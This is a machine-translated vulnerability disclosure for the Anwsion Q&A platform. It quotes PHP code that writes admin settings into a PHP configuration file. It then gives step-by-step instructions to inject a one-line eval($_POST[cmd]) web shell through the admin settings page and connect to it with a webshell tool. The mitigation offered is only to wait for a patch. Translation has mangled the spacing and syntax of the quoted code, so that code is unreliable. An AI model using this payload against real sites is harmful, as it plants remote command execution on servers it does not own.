The vulnerability affects all versions.
Combined with all versions earlier than Anwsion 0.7, the site can be intruded.
The code for the design defect is as follows: lines 75-96 Save the website background configuration to the database and save it to the local PHP file, which can be executed by writing a sentence.
/App/admin/controller/c_setting_class.inc.php
// Save parameters to the database
$ Retval = $ this-> model ('setting')-> set_vars ($ vars );
// Save the cached File
If (! $ This-> model ('setting')-> update_setting_config ())
{
H: ajax_json_output (AWS_APP: RSM (null, "-1", 'the configuration file cannot be written. Set the file system/config/setting. php permission to 0777. '));
}
If ($ retval)
{
ZCACHE: delete ("setting_config ");
H: ajax_json_output (AWS_APP: RSM (null, "1", "system settings modified successfully "));
}
Else
{
H: ajax_json_output (AWS_APP: RSM (null, "-1", "failed to modify system settings "));
}
}
The content of the written configuration file is as follows: system/config/setting. php
Access the background system settings address
Http://sa.sebug.net/admin/setting/setting/group_id-1
Add a sentence \ '; eval ($ _ POST [cmd]) at the website overview; //
Session management tools connect to one sentence/system/config/setting. php
Configuration files of earlier versions of Anwsion 0.6 or earlier are written to/gzphp/config/setting. php
If you cannot access a single sentence file due to rewrite restrictions, you can directly connect to the/index. php file using a one-sentence management tool.
A single sentence file is successfully connected.
Solution:
Wait for the official patch or follow the latest updates.
After the vulnerability is released, developers will be notified to claim it to avoid malicious exploitation.
I wonder why one more code is added in one sentence in vulnerability preview. \ is this added to prevent XSS attacks?
I do not know if one more \ will be added when the browser is browsed after the review is passed. Otherwise, the test will be misled by others.